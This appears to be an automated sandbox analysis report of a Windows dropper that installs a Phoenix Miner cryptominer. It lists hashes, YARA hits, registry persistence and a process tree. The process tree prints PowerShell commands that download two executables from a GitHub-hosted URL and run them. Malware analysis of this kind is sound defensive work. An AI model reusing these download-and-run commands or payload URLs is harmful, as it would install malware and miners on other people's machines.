Analysis
-
max time kernel
140s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
12-09-2022 20:06
Behavioral task
behavioral1
Sample
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
Resource
win10v2004-20220812-en
General
-
Target
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
-
Size
8.3MB
-
MD5
9ed9ad87a1564fbb5e1b652b3e7148c8
-
SHA1
0c001b7e9615cbc22eac2a324d8deb7eaf069ff7
-
SHA256
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89
-
SHA512
e49e403a73ff1d10111d23cc70ae95ffae63abbc4a52cfc52c447ee9f15e76ab44f07d0f41e3b3e63a73a07e7748b8ac7ed8c997f1051a10ca5fad1dace4183a
-
SSDEEP
196608:8eOr3LD6MZ+NL0j/YjNV4p9eLDZPhujwk8kAb+RWvqWd6qmgNSN:8TbnQYiN2eRPhSwhk8s46C4N
Malware Config
Extracted
https://raw.githubusercontent.com/jkh36/d/main/bild.exe
https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe
Signatures
-
Detectes Phoenix Miner Payload 5 IoCs
Processes:
yara_rule miner_phoenix C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe miner_phoenix C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe miner_phoenix behavioral2/memory/2396-135-0x0000000000000000-mapping.dmp miner_phoenix behavioral2/memory/3708-147-0x0000000000000000-mapping.dmp miner_phoenix -
Executes dropped EXE 1 IoCs
Processes:
PhoenixMiner.exepid process 4616 PhoenixMiner.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
PhoenixMiner.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce PhoenixMiner.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" PhoenixMiner.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 2396 powershell.exe 2396 powershell.exe 3708 powershell.exe 3708 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exePhoenixMiner.exedescription pid process target process PID 3924 wrote to memory of 4616 3924 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 3924 wrote to memory of 4616 3924 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 3924 wrote to memory of 4616 3924 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 4616 wrote to memory of 2396 4616 PhoenixMiner.exe powershell.exe PID 4616 wrote to memory of 2396 4616 PhoenixMiner.exe powershell.exe PID 4616 wrote to memory of 2396 4616 PhoenixMiner.exe powershell.exe PID 4616 wrote to memory of 3708 4616 PhoenixMiner.exe powershell.exe PID 4616 wrote to memory of 3708 4616 PhoenixMiner.exe powershell.exe PID 4616 wrote to memory of 3708 4616 PhoenixMiner.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/jkh36/d/main/bild.exe,https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe -Destination lWr.exe,ck.exe;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Start-Process lWr.exe; Start-Process ck.exe;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5b6deac3351c943410eafe90bc93687c8
SHA134ff10b6e186ff6f7b6f39ebb127ee137ade5589
SHA2561775d61fb6831a2c572bb51d5772952ee13bbee68bde0367546bb04811a70f0a
SHA5123e025c20277dff003fe09afa2a9014d2fe42761bec935f7d7eb917ddb5b8760d5e3bc643e81d28fa7352c398cbdffcc0dbb5302e7fc6b97969387a3ef313b880
-
Filesize
19KB
MD53ce5123d2cf880b8de7c463668ec5136
SHA1e918284c0fa3baf122a2db6507a59e05cb6eff25
SHA2561983457a39c02365e1a9b889765b29c89d005d2891d9ee2e1df0386ec79bef20
SHA5120a022c17c6db7657902ea796b8aecc73152fc1ac09664e3c5f2322bbc1e9a7401d968f3d98152c35d07af19ff9212cce181d110bbd68708b902e406de6dba6ac
-
Filesize
8.2MB
MD5c74ab76362f2321b7143e8ba2517c16b
SHA16b4c65e2b1ba59d155c5d453285fae4d3e52b2a6
SHA256938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f
SHA5122a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17
-
Filesize
8.2MB
MD5c74ab76362f2321b7143e8ba2517c16b
SHA16b4c65e2b1ba59d155c5d453285fae4d3e52b2a6
SHA256938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f
SHA5122a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17